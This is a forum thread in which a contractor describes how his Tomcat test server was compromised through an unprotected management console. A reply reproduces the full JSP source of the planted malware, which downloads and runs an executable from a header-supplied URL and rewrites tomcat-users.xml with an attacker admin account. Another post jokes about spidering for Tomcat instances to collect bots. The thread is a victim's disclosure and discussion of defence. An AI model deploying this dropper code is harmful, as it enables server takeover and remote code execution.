• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!
Collapse

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

  • You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
  • You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
  • If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

Previously on "Someone hacked my Tomcat server"

Collapse

  • scooterscot
    replied
    Originally posted by DaveB View Post
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
    I've just put a windows installation via parallels open to the internet. Days pass no problem runs smoothly.

    What did I do?

    I stripped it of every service you could imagine since I require it to run only one installation.

    It's all the stupid services that let this platform down IMO. I used XPlite.

    Leave a comment:


  • minestrone
    replied
    Originally posted by NickFitz View Post
    They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

    EDIT: looks like it's an automated thing.
    That was the first page I hit when I googled the war file.

    I am actually surprised they have not done anything about it since the guy posted it. Actually, tomcat is now pretty much a IBM/Apache/RedHat project so I am not surprised.

    Leave a comment:


  • NickFitz
    replied
    Originally posted by minestrone View Post
    I am fairly sure they will hit on me again, I wonder where the IP will be from?

    My money is on Russia
    They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

    EDIT: looks like it's an automated thing.
    Last edited by NickFitz; 23 March 2009, 16:04.

    Leave a comment:


  • minestrone
    replied
    Changed the code to this..

    Code:
    <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
    <%
    
    System.out.println( "==============================================" ) ;
    
    System.out.println( "Cache-Vip-Url: (spyware exe) " + request.getHeader("Cache-Vip-Url") ) ;
    System.out.println( "IP:                          " + request.getRemoteAddr() ) ;
    System.out.println( "SERVER:                      " + request.getServerName() ) ;
    System.out.println( "REQUEST:                     " + request ) ;		
    
    request.setAttribute("result","Success! ");
    		
    request.getRequestDispatcher("/ok.jsp").forward(request, response);
     %>
    I am fairly sure they will hit on me again, I wonder where the IP will be from?

    My money is on Russia

    Leave a comment:


  • minestrone
    replied
    Here is the code is anyone is interested..

    Code:
    <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
    <%!
    	String pass=null;
    	String sys=null;
    	
    	String url=null;
    	String filesrc=null;
    		
    public class AutoKill {
    	
    	private String killLoophole(String path) throws Exception
    	{
    		try
    		{
    			String pass=randomPass();
    			FileOutputStream fos=new FileOutputStream(path);
    			String s="<?xml version='1.0' encoding='utf-8'?>\r\n";
    			s=s+"<tomcat-users>\r\n";
    			s=s+"\t<role rolename=\"tomcat\"/>\r\n";
    			s=s+"\t<role rolename=\"role1\" />\r\n";
    			s=s+"\t<role rolename=\"manager\"/>\r\n";
    			s=s+"\t<role rolename=\"admin\"/>\r\n";
    			s=s+"\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n";
    			s=s+"</tomcat-users>";
    			byte[] b=new byte[1024];
    			b=s.getBytes();
    			fos.write(b);
    			fos.close();
    			return pass;
    		}catch(Exception e)
    		{
    			return null;
    		}
    		
    	}
    	
    	private String randomPass()
    	{
    		StringBuffer pass = new StringBuffer(); 
    		int i =0;
    		while(i<5) 
    		{
    		 i=(int)(Math.random()*12);
    		}
    		
    		for(int j=0;j<=i;j++)
    		{
    			char c = (char)(Math.random()* 26 + 'A');
    			pass.append(c);
    		}
    		return pass.toString()+String.valueOf(((int)(Math.random()*10000)));
    	}
    	
    	private boolean clean(String src)
    	{
    		File file=new File(src+".war");
    		if(file.exists())
    			if(file.delete())
    			{
    				return true;
    			}
    		return false;
    	}
    	
    	private boolean downFile(String url,String filesrc)
    	{
    		try
    		{
    		URL urlc = new URL(url);
    		HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
    		con.connect();
    		byte[] b=new byte[1024];
    		BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
    		FileOutputStream fos=new FileOutputStream(filesrc);
    		int length=-1;
    		while((length=bis.read(b,0,b.length))!=-1)
    		{
    			fos.write(b,0,length);
    		}
    		fos.close();
    		bis.close();
    		Process run_proc=Runtime.getRuntime().exec(filesrc);
    		return true;
    		}catch(Exception e)
    		{	
    		}
    		return false;
    	}
    	
    	
    	private boolean exeFile()
    	{
    		boolean afly=false;
    	    if (downFile(url,filesrc))
    	    afly=true;
    		
    		return afly;
    	}
    	
    }
    %>
    <%
    		sys=System.getProperty("os.name");
    		int i=sys.indexOf("Windows");
    		AutoKill ak=new AutoKill();
    		url=request.getHeader("Cache-Vip-Url");
    		if (i>-1)
    		{
    				String result;
    				try
    				{
    					filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
    					if (ak.exeFile())
    					{
    						result="Success! ";
    						pass=ak.killLoophole(System.getProperty("catalina.base")+"/conf/tomcat-users.xml");
    						if(ak.clean(request.getSession().getServletContext().getRealPath("")))
    						result=result+"Undeployed application at context path "+request.getContextPath()+"! ";
    					if (pass!=null)
    						result=result+"After the change password:"+pass+"! ";
    					}
    					else
    					{
    						result="Failure! Down File Failure!";
    					}
    				}catch(Exception e)
    				{
    					result="Failure!throws Exception - "+e.getMessage()+"! ";
    				}
    				request.setAttribute("result",result);
    		}
    		else
    		{
    			request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
    		}
    		
    		request.getRequestDispatcher("/ok.jsp").forward(request, response);
     %>
    PCClient.N was the trojan that was caught.

    I could probably knock up a web spider in a couple of hours that searches for tomcat instances and have a good few bots under my control by the end of the week.

    Leave a comment:


  • suityou01
    replied
    Originally posted by ~Craig~ View Post
    should have gone Linux and you'd have been ok
    How is tomcat management console less hackable under Linux?

    Leave a comment:


  • ~Craig~
    replied
    should have gone Linux and you'd have been ok

    Leave a comment:


  • minestrone
    replied
    IT was Windows Defender under a trial I am running of Windows Live Care that caught the exe running and switched it off.

    I am sure they would just continue to push exes towards me, it's tempting to mod the code of the thing and just debug out requests and the IPs of where they are coming from.

    I'm just shocked they found it and also there is a hack written for tomcat.

    Leave a comment:


  • d000hg
    replied
    Originally posted by DaveB View Post
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
    There's no such thing as an "unprotected windows box" these days. By default, a clean install of Windows can't connect to anything except Windows update, IIRC (or some similar precaution)... and the Windows firewall firewall is on by default I think.
    You are absolutely right though, when we tried to connect an old PC to our broadband, it couldn't even complete the broadband installation before being swamped with rubbish.

    Leave a comment:


  • minestrone
    replied
    Full firewall, AV, all updated.

    They just got in through the tomcat management console because I never switched it off.

    Leave a comment:


  • DaveB
    replied
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.

    Leave a comment:


  • minestrone
    started a topic Someone hacked my Tomcat server

    Someone hacked my Tomcat server

    Got a test server for Plan B in the house, it runs on port 8080 and I never really suspected anyone would find it so I made the schoolboy error of not making it safe by removing the management console.

    Had to do an upgrade to the software today and noticed a new web application called fexcepkillshell.war running under it, so I'm like WTF? I never put that there.

    So I stop the server and have a look at the code in it, it hacks the users file, restarts the server then it awaits URL hits which I think tells it to download an exe then runs it.

    I don't think it worked, Windows Live care has a few extra 'security events' in the last few days.

    Wake up call really, server is safe now but it shows you never to be complacent.

Working...
X